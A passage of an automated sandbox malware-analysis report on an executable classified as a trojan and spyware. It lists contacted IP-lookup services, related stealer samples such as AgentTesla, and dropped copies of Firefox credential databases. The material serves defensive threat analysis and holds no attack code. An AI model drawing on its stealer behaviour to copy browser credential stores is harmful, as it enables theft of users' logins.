                    https://www.office.com/14posdLrGh.exe, 00000000.00000002.1677581277.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmp, tmpCF47.tmp.dat.0.drfalse
                      		high
                      https://duckduckgo.com/chrome_newtab14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                        		high
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmp57A8.tmp.dat.0.drfalse
                          		high
                          https://duckduckgo.com/ac/?q=14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                              		high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                                		high
                                https://www.office.com/OfficetmpCF47.tmp.dat.0.drfalse
                                  		high
                                  http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                                    		high
                                    http://ocsp.rootca1.amazontrust.com0:cert9.db.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201614posdLrGh.exe, 00000000.00000002.1677581277.0000000002653000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003736000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.000000000351E000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drfalse
                                      		high
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1714posdLrGh.exe, 00000000.00000002.1677581277.0000000002653000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003736000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.000000000351E000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drfalse
                                        		high
                                        https://chrome.google.com/webstore?hl=en14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmp, tmp3F88.tmp.dat.0.drfalse
                                          		high
                                          https://www.ecosia.org/newtab/14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                                            		high
                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp57A8.tmp.dat.0.drfalse
                                              		high
                                              https://support.mozilla.org/products/firefox14posdLrGh.exe, 00000000.00000002.1677581277.000000000252A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://chrome.google.com/webstore?hl=enWebtmp3F88.tmp.dat.0.drfalse
                                                  		high
                                                  https://www.office.com/LR14posdLrGh.exe, 00000000.00000002.1677581277.00000000028BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                                                      		high
                                                      http://x1.c.lencr.org/0cert9.db.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://x1.i.lencr.org/0cert9.db.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install14posdLrGh.exe, 00000000.00000002.1678676534.0000000003711000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                                                          		high
                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://ip-api.com14posdLrGh.exe, 00000000.00000002.1677581277.000000000280F000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002894000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://icanhazip.com14posdLrGh.exe, 00000000.00000002.1677581277.000000000259B000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.mozilla.orgtmp57A8.tmp.dat.0.drfalse
                                                                		high
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples14posdLrGh.exe, 00000000.00000002.1678676534.0000000003711000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, tmpCE60.tmp.dat.0.dr, tmp1A47.tmp.dat.0.drfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name14posdLrGh.exe, 00000000.00000002.1677581277.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://whatismyipaddressnow.co14posdLrGh.exe, 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • 9%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=14posdLrGh.exe, 00000000.00000002.1678676534.0000000003608000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1678676534.0000000003536000.00000004.00000800.00020000.00000000.sdmp, tmpA7A9.tmp.dat.0.dr, tmp6564.tmp.dat.0.drfalse
                                                                      		high
                                                                      https://support.micro14posdLrGh.exe, 00000000.00000002.1677581277.0000000002653000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://whatismyipaddressnow.co14posdLrGh.exe, 00000000.00000002.1677581277.0000000002919000.00000004.00000800.00020000.00000000.sdmp, 14posdLrGh.exe, 00000000.00000002.1677581277.0000000002491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 9%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      208.95.112.1
                                                                      		ip-api.comUnited States
                                                                      		53334TUT-ASUSfalse
                                                                      172.67.143.245
                                                                      		whatismyipaddressnow.coUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      104.16.184.241
                                                                      		icanhazip.comUnited States
                                                                      		13335CLOUDFLARENETUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1438234
                                                                      Start date and time:2024-05-08 13:54:04 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 6m 0s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:12
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:14posdLrGh.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:52f30bf4980337fd9e150ac186c5c04d08674bacc468235ecf2ab8f925f889be.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@11/18@4/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 294
                                                                      • Number of non-executed functions: 8
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      13:54:49API Interceptor43x Sleep call for process: 14posdLrGh.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      208.95.112.1CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      VADliS09qx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      fG9gFsyfsK.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      #U00f6deme onaylama.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      TNT AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      Purchase Order_#400388875.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      cir0tBXcdO.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      172.67.143.245RFQ-M310 .exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                        file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                          slim_man.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                            RFQ_N0_6547-755-2024.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                              PROJECT_RFQ.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                17049844844c91418df05caa784d7b01efd38530d3b9f4085141b3efa51b2282b1bd03abee258.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                  Product_lists_.xlam.xlsxGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                    New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                      RYwCwF604X.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                        PO#SWASA2200157.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                          104.16.184.241Chlorine 2.0.exeGet hashmaliciousBabadedaBrowse
                                                                                            Chlorine 2.0-clean.exeGet hashmaliciousBabadedaBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              whatismyipaddressnow.coRFQ-M310 .exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.21.71.78
                                                                                              PURCHASE_ORDER.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.21.71.78
                                                                                              bigfat.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.21.71.78
                                                                                              Inquiry_HCSG2312150835.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.21.71.78
                                                                                              slim_man.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              RFQ_N0_6547-755-2024.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              PROJECT_RFQ.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              ehehre.htaGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.21.71.78
                                                                                              ip-api.comCA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              VADliS09qx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              fG9gFsyfsK.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              #U00f6deme onaylama.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              Purchase Order_#400388875.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              cir0tBXcdO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              icanhazip.comChlorine 2.0.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 104.16.184.241
                                                                                              Chlorine 2.0-clean.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 104.16.184.241
                                                                                              Chlorine 2.0.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 104.16.185.241
                                                                                              Chlorine 2.0-clean.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 104.16.185.241
                                                                                              RFQ-M310 .exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.16.185.241
                                                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.16.185.241
                                                                                              a.cmdGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.185.241
                                                                                              UMJLhijN4z.exeGet hashmaliciousAsyncRAT, Prynt Stealer, StormKitty, WorldWind StealerBrowse
                                                                                              • 104.16.185.241
                                                                                              https://lithiuimvalley.com/ssdGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                              • 104.16.185.241
                                                                                              file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                              • 104.16.185.241

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSwindows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                              • 104.18.20.226
                                                                                              CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.21.84.67
                                                                                              windows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.22.1.235
                                                                                              CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.148.22
                                                                                              cf3fLcs0m0.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.26.13.205
                                                                                              j4SPw1P5CF.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.205.94
                                                                                              https://t.co/q6ERXNBypPGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              Receipt207413.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.13.205
                                                                                              q74Q4gS3Hm.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                              • 104.26.13.205
                                                                                              CLOUDFLARENETUSwindows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                              • 104.18.20.226
                                                                                              CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 104.21.84.67
                                                                                              windows.10.codec.pack.v2.2.0.setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.22.1.235
                                                                                              CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.148.22
                                                                                              cf3fLcs0m0.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 104.26.13.205
                                                                                              j4SPw1P5CF.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.67.74.152
                                                                                              rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.205.94
                                                                                              https://t.co/q6ERXNBypPGet hashmaliciousUnknownBrowse
                                                                                              • 104.17.25.14
                                                                                              Receipt207413.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.13.205
                                                                                              q74Q4gS3Hm.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                              • 104.26.13.205
                                                                                              TUT-ASUSCA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              CA-OP2402406.xlaGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              VADliS09qx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              fG9gFsyfsK.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              #U00f6deme onaylama.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1
                                                                                              DHL Shipment Notification.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              Purchase Order_#400388875.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 208.95.112.1
                                                                                              cir0tBXcdO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 208.95.112.1

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              54328bd36c14bd82ddaa0c04b25ed9adU prilogu je nova lista narudzbi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              list of items.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              FAHJ98766700008022.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              MB263350411AE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              order pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                                                              • 172.67.143.245
                                                                                              Nova ordem.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              Halkbank_Ekstre_20230321_080804_358439.pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              7Ql51TchBG.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                                                              • 172.67.143.245
                                                                                              BTUJ5A5J3m.exeGet hashmaliciousLimeRATBrowse
                                                                                              • 172.67.143.245
                                                                                              3b5074b1b5d032e5620f69f9f700ff0evjk2FB3esY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              cf3fLcs0m0.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.67.143.245
                                                                                              j4SPw1P5CF.exeGet hashmaliciousGuLoaderBrowse
                                                                                              • 172.67.143.245
                                                                                              Receipt207413.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 172.67.143.245
                                                                                              q74Q4gS3Hm.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                              • 172.67.143.245
                                                                                              COMPANY PROFILE_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 172.67.143.245
                                                                                              20240508VEPA-Zapytanie o ofert#U0119 handlow#U0105.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.143.245
                                                                                              uzFrAkagaX.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.143.245
                                                                                              PO inquiry #8374389203847_Pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.143.245
                                                                                              Metrology-Hydraulic press TPC-3 machine.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                              • 172.67.143.245

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\14posdLrGh.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1616
                                                                                              Entropy (8bit):5.346184626026755
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:MxHKlYHKh3oPtHo6hAHKzePHiHKYH/HKx1qHxLHVHj:iqlYqh3oPtI6eqzGCqYfqxwRL1D
                                                                                              MD5:CB652A0F120B7BE06827FFF3C2B6AD70
                                                                                              SHA1:85DE420A6E02A4FC062EA85113B5ABF93F568B55
                                                                                              SHA-256:B38E77D387BAD5A94D0573E5D84B0AD887B40F3F255E29C589C8B0BE35807BC0
                                                                                              SHA-512:9B9E9D4552684E64291DDF6769AC6F77BED5FA38DCB58BD910D61119AC5A5A5AF83572B210C9FD8CD71033917EA94D3CCFFDE5F3DF66772504C5E41C0653782B
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

                                                                                              C:\Users\user\AppData\Local\Temp\fqs92o4p.default-release\cert9.db

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):229376
                                                                                              Entropy (8bit):0.64343788909108
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:A1zkVmvQhyn+Zoz67dNlIMMz333JGN8j/LKXYj5kuv:AUUMXCyIr
                                                                                              MD5:B6787B79D64948AAC1D6359AC18AB268
                                                                                              SHA1:0831EB15AB2B330BE95975A24F8945ED284D0BA4
                                                                                              SHA-256:9D6FD3B8AB8AA7934C75EDE36CEB9CF4DDAD06C5031E89872B4E814D7DB674E2
                                                                                              SHA-512:9296866380EF966F1CB6E69B7B84D1A86CD5AE8D9A7332C57543875FAA4FC7F1387A4CF83B7D662E4BAB0381E4AFC9CB9999075EBB497C6756DF770454F3530E
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\fqs92o4p.default-release\key4.db

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\14posdLrGh.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):294912
                                                                                              Entropy (8bit):0.08436842005578409
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                              MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                              SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                              SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                              SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
